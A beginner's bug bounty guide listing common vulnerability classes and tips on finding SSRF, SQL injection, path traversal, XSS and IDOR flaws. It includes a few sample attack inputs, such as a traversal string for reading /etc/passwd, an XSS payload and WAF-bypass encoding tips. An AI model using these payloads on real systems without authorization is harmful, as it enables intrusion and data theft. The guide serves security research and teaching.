Bug Bounty Hunting

A simple and minimalist guide to start into Security Researching, specifically in the Bug Bounty.

What to do to start into Bug Bounty Hunting or Security Research

Essential Checklist

  • Discovery

  • Code Review

  • Authentication & Authorization attacks

  • Function-specific / business logic attacks

  • Technology-speficic atack

  • SSRF

  • IDORs

  • Injection (Headers, Cookies, APIs, Parameters, Values)

  • Other attacks (depends on the app)

  • Reporting and Get Bounty

Bugs & Vulnerabilities Checklist

  • Subdomain Recon

    • Subdomain Takeover

    • Open Ports

      • Admin panel

        • Default Credentials

  • Find Parameters

    • XSS

    • Path Traversal

      • LFI

      • RFI

    • Command Injection

    • Open Redirect

    • SQL Injection

    • NoSQL Injection

    • SSTI Injection

  • Cloud Enumeration

    • Open Buckets (AWS, Azure, Google Cloud, etc...)

  • Fuzzing Common Paths

    • 401/403 Bypass

  • Directories and Endpoints

    • Login Panels

    • Forms and Inputs

    • Information Disclosure

    • IDOR

Top Vulnerabilities 2024

  • Authentication & Authorization attacks

  • Manual / Business Logic Error

  • NoSQL Injection (MongoDB & Redis)

  • Cross-site scripting (XSS)

  • Insecure direct object reference (IDOR)

  • Information Disclosure

  • SQL Injection

  • API Hacking

HackerOne Top 10 Vulnerabilities 2023

  • Improper access control - generic

  • Information Disclosure

  • Cross-site scripting (XSS) - Reflected

  • Insecure direct object reference (IDOR)

  • Privilege Escalation

  • Cross-site scripting (XSS) - Stored

  • Misconfiguration

  • Improper authentication - generic

  • Business logic errors

  • Cross-site scripting (XSS) - DOM

https://www.hackerone.com/top-ten-vulnerabilities

Where to look for Vulnerabilities

Where to look for SSRF

  • In query or parameters like "redirect", "url", "next", etc...

  • When server is fetching data like JS files, CSS or Images from another host.

  • Features depending on the app which check the "status" or something similar.

  • The key is to get access to the Internal Network and have access to the files and resources inside.

Where to look for SQLi

  • Forms with POST Requests, if the Response returns Status Code 500 (Internal Server Error) appear to be vulnerable.

  • Inputs that query the database for values such as usernames, passwords, ids, etc. ....

  • Always try to inject queries to the database to find out how to get access to the database or execute queries and get information.

Where to look for Business Logic Errors

  • These kinds of vulnerabilities are uniques bugs that are found by original techniques which can be performed by trying differents methods of hacking. So the mayority of those attacks depends specially on the app and the attacker.

  • It can be found by analyzing the source code and trying to exploit some specific features of the application.

  • Most common of business logic errors occur when you break the logic of the application and try to exploit the use of it.

Where to look for LFI or RFI (Path Traversal)

  • In order to perform Path Traversal it's necessary to identify where the application is loading an internal file like: file://../../app/index.php. Generally occurs in endpoints which has parameters like: "file", "view", "download", "doc", etc...

  • Try with different encodings to bypass WAF like HTML, Unicode, URL, Double URL, Hex, etc.

  • Try perform path traversal by inyect ..0x2f..0x2f..0x2f..0x2f../etc/passwd (if Linux), or as well file:///etc/passwd, etc...

Where to look for XSS and how to craft it (Basic)

  • When submit a value to a key/parameter and it is reflected in the DOM (HTML), then try to inyect code to escape HTML Tags and create your custom XSS payloads. For example: >;'</input><svg ONly ONLoad=confirm()>//

  • To you understand how to craft XSS payloads, you need: 1. Know HTML tags. 2. Understand the basics of JavaScript, and 3. Have fun crafting XSS payloads.

  • In order to bypass the most common multiple WAF rules it is necessary to encode the characters in encodings that are processed by the back-end. Some of them are the following: HTML tags, Hex, URL and double URL encoding, Unicode Escapes, and more.

  • Keep in mind that "If WAF is too hard to bypass, try in another endpoint". (Not all endpoints are vulnerables).

Where to look for IDOR

  • "IDOR" or "Insecure Direct Object Reference" is a vulnerability that occurs when the value as an ID or object identifier is modified and then the attacker gains unauthorized access to the information. Typically they are BOLA (Broken Object Level Authorization).

  • Let's take this example: You have intercepted with BurpSuite or Caido a request whose path is something like this: /api/v2/current/view. Here are many attacks to probe: 1. Change v2 to v1, v0 or v3, or just delete it. Then try changing current to an email, application user id, etc....

  • You can also try changing view to edit or delete, create. These are some of the techniques most commonly found in vulnerable applications when the back-end is not sanitized.

PreviousTools and HacksNextStatic Analysis

Last updated